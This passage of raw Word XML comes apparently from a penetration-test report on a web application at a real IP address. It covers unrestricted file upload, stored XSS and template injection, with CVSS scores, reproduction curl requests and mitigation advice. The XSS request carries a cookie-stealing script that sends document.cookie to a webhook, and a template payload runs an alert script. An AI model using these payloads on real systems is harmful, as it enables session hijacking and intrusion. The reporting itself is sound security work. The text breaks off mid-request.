    <w:p w14:paraId="0F1977A8" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Code example:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>curl "http://13.41.78.176/upload" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F102339" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept: text/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09242E95" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>US,en</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0.9" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1BBAAF" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Cache-Control: max-age=0" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED59A06" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryS5v1tESMBMZVSHR3" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4382B8D6" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Origin: http://13.41.78.176" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F9CFB9" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Proxy-Connection: keep-alive" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A2A7D9" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: http://13.41.78.176/upload" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650E2026" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Upgrade-Insecure-Requests: 1" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F4366E" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D917FD" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  --data-raw ^"------WebKitFormBoundaryS5v1tESMBMZVSHR3^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7A32AF" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="39F71B06" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Content-Disposition: form-data; name=^\^"file^\^"; filename=^\^"losho.html^\^"^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D4788A" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="0D212B4A" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Content-Type: text/html^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C86719A" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="5CC0F1DE" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BB214" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="68BBA0B3" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0110E18D" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="7FA98E9F" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>------WebKitFormBoundaryS5v1tESMBMZVSHR3--^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D17701" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="4CCF2F83" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>^" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E9FBD" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  --compressed ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A34A0" w14:textId="2022E5C3" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  --insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD25297" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="3D8BD819" w14:textId="4A293230" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Result shown in Files section -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5612134E" w14:textId="2487010B" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A3FCD06" wp14:editId="4247C22F">
            <wp:extent cx="5486400" cy="3053080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="423001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01099" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3053080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D597E" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="50F92377" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D279C8" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immediate Mitigation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disable the file upload functionality until proper security controls are implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25969033" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement strict file type validation and content checks to allow only authorized file types and prevent executable files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C26C441" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apply sandboxing techniques or execute uploaded files in isolated environments to mitigate potential threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1643BAC9" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implement user authentication and authorization mechanisms to control access to the file upload functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C532668" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="77D94BE7" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc155811468"/>
      <w:r>
        <w:t xml:space="preserve">5.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C71329">
        <w:t>Stored Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="04F2A0DC" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="2C0A3A1C" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6401FD" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">CVSS 3.1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Score</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE52373" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">Scoring Vector: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3FEBF0" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="2B31B95E" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FB7AAB" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>The "Watcher - What do you think about our Watcher?" and "Image Viewer - Enter image URL and it will be displayed" functionalities are susceptible to Stored Cross-Site Scripting (XSS) attacks. The lack of proper input validation or output encoding mechanisms allows an attacker to inject malicious JavaScript code into these input fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74170B86" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="6C7DA7A2" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="5C4EF113" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>curl "http://13.41.78.176/comment" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B833B78" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept: text/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D5511" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>US,en</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0.9" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D054B49" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Cache-Control: max-age=0" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F260EC0" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5210D6C8" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Origin: http://13.41.78.176" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C9A3C" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Proxy-Connection: keep-alive" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D85D8FF" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: http://13.41.78.176/watcher" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E2895F" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "Upgrade-Insecure-Requests: 1" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD0070" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6BD81" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  --data-raw "comment=^%^3Cscript^%^3Edocument.write^%^28^%^22^%^3Cimg+src^%^3D^%^27t</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>he+webhook^%^22^%^2Bdocument.cookie^%^2B^%^22^%^27^%^3E^%^3C^%^2Fimg^%^3E^%^22^%^29^%^3B^%^3C^%^2Fscript^%^3E" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60B83B" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  --compressed ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C43CC5" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t xml:space="preserve">  --insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD1C3C" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="2B2AF486" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="06D0EF50" w14:textId="597CE702" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060635D9" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="36E4656F" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B6479B4" wp14:editId="49A1AFDA">
            <wp:extent cx="5486400" cy="2653030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1009905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5455" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2653030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E51AA8" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="33830709" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B1B26B" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement input validation to restrict or sanitize user input, preventing the injection of HTML/JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70169E04" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apply output encoding or escaping techniques to ensure user-supplied content is displayed safely without executing scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB8F5EB" w14:textId="77777777" w:rsidR="00C71329" w:rsidRPr="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Perform security reviews and conduct regular security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trainings</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C71329">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to educate developers about secure coding practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E50EE" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="0E51FD56" w14:textId="77777777" w:rsidR="00C71329" w:rsidRDefault="00C71329" w:rsidP="00C71329"/>
    <w:p w14:paraId="0D548D4A" w14:textId="0554D2A2" w:rsidR="00C71329" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc155811469"/>
      <w:r>
        <w:t xml:space="preserve">5.6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA24AF">
        <w:t>Template Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="439B84FC" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t>Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049938F" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">CVSS 3.1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Score</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 8.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F242320" w14:textId="61AEB0E2" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Scoring Vector: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>AV:N</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC0BE1A" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF"/>
    <w:p w14:paraId="60112574" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5019058A" w14:textId="0CD6B17B" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t>The application's templating system is vulnerable to Template Injection, as evidenced by the presence of the payload {{define "T1"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>}}&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>script&gt;alert(1)&lt;/script&gt;{{end}} {{template "T1"}}. This payload demonstrates the ability to define a template named "T1" containing a malicious script and then rendering it using {{template "T1"}}.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE33A87" w14:textId="0FF25460" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF"/>
    <w:p w14:paraId="656E9BE9" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">Code – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730EE8D0" w14:textId="3AA4F598" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t>curl "http://13.41.78.176/comment" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0655DF" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept: text/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74190B79" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  -H "Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>US,en</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0.9" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDA1B63" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  -H "Cache-Control: max-age=0" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D599DAC" w14:textId="77777777" w:rsidR="00EA24AF" w:rsidRDefault="00EA24AF" w:rsidP="00EA24AF">
      <w:r>
        <w:t xml:space="preserve">  -H "Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
